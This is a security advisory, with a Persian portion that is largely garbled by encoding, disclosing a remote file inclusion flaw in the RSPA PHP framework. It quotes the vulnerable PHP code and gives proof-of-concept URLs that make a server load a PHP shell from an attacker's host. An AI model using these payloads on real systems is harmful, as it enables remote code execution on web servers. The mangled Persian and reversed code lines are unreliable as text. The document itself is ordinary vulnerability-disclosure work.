Академический Документы
Профессиональный Документы
Культура Документы
:!"#$%
&/#$% &)01
RSPA 2(3% &4 Really Simple PHP and Ajax () ای7* 89: ای#* ;<=7% ده#@ +ABCD%#4 EF GH#* I% PHP
#J س04 ازI<LM7= N%#H &4 GH#* I% 5 و4 ي#J &3QB PHP وHTML/Javascript IBاC1ا7R ن#9%& ا4 GH#* I%
T*اC= PHP زد#@ I% UJا7R ی7V,% +W@ +X79@واا#: ی#J ادGF روZF7[ ور را از7@ +W@ .
GH#* I% I@7V@ دN*#\ 7F در آدرس ز.
http://rspa.sourceforge.net
I^)_ ا%
:Credit
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir
http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6
:Vulnerable Systems
Version: rspa-2007-03-23
:Description
Input passed to the" __IncludeFilePHPClass ", " __ClassPath" and " __class" parameters in
"rspa/framework/Controller_v5.php" and " rspa/framework/Controller_v4.php " is not properly
verified before being used to include files. This can be exploited to execute arbitrary PHP
.code by including files from local or external resources
: Vulnerable Code
;("require_once("rspaconf.inc.php
;['className = $_REQUEST['__class$
;['methordName = $_REQUEST['__methord$
ClassFile + ClassPath //
;("include ("../components/Form.class.php
}((["if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath
;['filename = $RSPA['class_folder'].$className.$RSPA['class_extension $
}else {
;['filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension$
{
;(require_once($filename
: POC exploit
The following URL will cause remote file inclusion
?/http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://phpshell.txt
?/http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://phpshell.txt
copyright : http://www.bugtraq.ir #
PHP ای7* 89: ا#* ;<=7% ده#@ +ABCD%#4 EF GH#* I% () Really Simple PHP and Ajax 2(3% &4 RSPA
.GH#* c% 5 و4 ی#J &3QB
ور را7@ +W@ PHP T*اC= IBاC1ا7R ن#9%& ا4 GH#* I% HTML/Javascript وPHP #J س04 ارI<LM7= N%#H &4
. زد#@ I% UJا7R ی7V,% +W@ +X79@واا#: ی#J ادGF روZF7[ از
: ت#'`dC=
" درclass __ " eAfWJ " وIncludeFilePHPClass ", " __ClassPath__ " 7V%را#X ورودی
rspa/framework/Controller_v4.php " " وrspa/framework/Controller_v5.php"
. GBCH IWB I@ر7* IVLA%ظ ا#'/ ازb@#A% رتCh* NF#R +@C`X ازi`X
I% ور7@ رج#1 وN1 ( از داphp ي#J G4 وی#k) اهC3/ی د#J NF#R ا7:در *& ا#\ ی7FaX b`@ آlF& *& ا:C= #* 7-ذC(B
. GH#*
. G`*#`* http://www.bugtraq.ir را درFile inclusion NF#R +@C`X ردC% در7V,`* ت#n0[ اG`BاC= I%
;("require_once("rspaconf.inc.php
;['className = $_REQUEST['__class$
;['methordName = $_REQUEST['__methord$
IncludeFile for PHP Class //
}(['if ($_REQUEST['__IncludeFilePHPClass
;['filename = $_REQUEST['__IncludeFilePHPClass $
;(require_once ($filename
{
Parms //
if (isset($_REQUEST['__parameters'])){$parameter =
{;""=getParms($_REQUEST['__parameters']);}else{$parameter
ClassFile + ClassPath //
;("include ("../components/Form.class.php
}((["if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath
;['filename = $RSPA['class_folder'].$className.$RSPA['class_extension $
}else {
;['filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension$
{
;(require_once($filename
http://[HOST]/rspa/framework/Controller_v5.php?
?/__IncludeFilePHPClass=http://attacker/phpshell.txt
?/http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt
http://www.bugtraq.ir #
دی#<n G`Wk